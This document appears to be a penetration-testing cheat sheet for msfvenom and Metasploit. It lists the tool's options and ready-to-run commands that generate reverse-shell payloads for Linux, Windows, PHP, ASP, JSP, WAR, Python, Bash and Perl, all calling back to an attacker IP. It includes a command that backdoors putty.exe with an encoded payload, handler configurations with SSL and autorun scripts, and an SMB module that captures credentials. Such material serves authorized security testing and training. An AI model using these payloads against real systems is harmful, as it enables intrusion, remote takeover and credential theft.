MSFVenom

-p, --payload <payload>        Payload to use. Specify a '-' or stdin to use custom payloads
-l, --list [module_type]       List a module type example: payloads, encoders, nops, all
-n, --nopsled <length>         Prepend a nopsled of [length] size on to the payload
-f, --format <format>          Output format (use --help-formats for a list)
-e, --encoder [encoder]        The encoder to use
-a, --arch <architecture>      The architecture to use
    --platform <platform>      The platform of the payload
-s, --space <length>           The maximum size of the resulting payload
-b, --bad-chars <list>         The list of characters to avoid example: '\x00\xff'
-i, --iterations <count>       The number of times to encode the payload
-c, --add-code <path>          Specify an additional win32 shellcode file to include
-x, --template <path>          Specify a custom executable file to use as a template
-k, --keep                     Preserve the template behavior and inject the payload as a new thread
    --payload-options          List the payload's standard options
-o, --out <path>               Save the payload
-v, --var-name <name>          Specify a custom variable name to use for certain output formats
-h, --help                     Show this message
    --help-formats             List available formats

Listing Modules

List payloads:
msfvenom -l payloads

List Encoders:
msfvenom -l encoders

List Payload Options:

msfvenom -p [payload] --payload-options

Examples

Linux Binaries:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows Binaries:
Encoding, Bad Characters and using a template

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f dll -o pentestlab.dll
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f exe -o met_reverse_tcp.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f exe -i 5 -e x86/shikata_ga_nai -o mal.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f exe --bad-chars '\x00\x0A\x0D' -o payload.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f exe -a x86 --platform windows -x putty.exe -k -e x86/shikata_ga_nai -i 5 --bad-chars '\x00\x0A\x0D' -o putty1.exe

PHP Web Payloads:

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f raw > shell.php

ASP Web Payloads:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f asp > shell.asp

JSP Web Payloads:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f raw > shell.jsp

WAR Web Payloads:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f war > shell.war

Python Scripting Payloads:

msfvenom -p cmd/unix/reverse_python LHOST=192.168.100.3 LPORT=44444 -f raw > shell.py

BASH Scripting Payloads:

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.100.3 LPORT=44444 -f raw > shell.sh

Perl Scripting Payloads:

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.100.3 LPORT=44444 -f raw > shell.pl

Handlers

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

msf > use exploit/multi/handler
msf exploit(handler) > setg PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
set LHOST 10.11.0.159
set LPORT 4343
LPORT => 4343
setg SHELL cmd.exe
exploit -j -z

set consolelogging true
set loglevel 5
set sessionlogging true
set timestampoutput true
set prompt %T S:%S J:%J
setg VERBOSE true

use auxiliary/server/capture/smb
set JOHNPWFILE john.txt
run

use multi/handler
set payload windows/meterpreter/reverse_tcp
setg LHOST 0.0.0.0
set SSL true
set LPORT 5667
setg AutoLoadStdapi true
setg AutoSystemInfo true
setg ExitOnSession false
setg EnableStageEncoding true
exploit -j -z

set payload windows/x64/meterpreter/reverse_tcp
set lport 5666
setg lhost 0.0.0.0

set payload windows/meterpreter/reverse_winhttps
set LPORT 443
set HandlerSSLCert /opt/CERT.pem
set IgnoreUnknownPayloads true
set AutoRunScript 'post/multi/gather/run_console_rc_file RESOURCE=/opt/autorun.rc'
set StagerVerifySSLCert true
exploit -j -z

setg Exe::CUSTOM /opt/ConsoleApp4.exe
set payload windows/meterpreter/reverse_tcp
set LPORT 5666
set HandlerSSLCert /opt/CERT.pem
set IgnoreUnknownPayloads true
set StagerVerifySSLCert true
set AutoRunScript 'post/multi/gather/run_console_rc_file RESOURCE=/opt/autorun1.rc'
exploit -j -z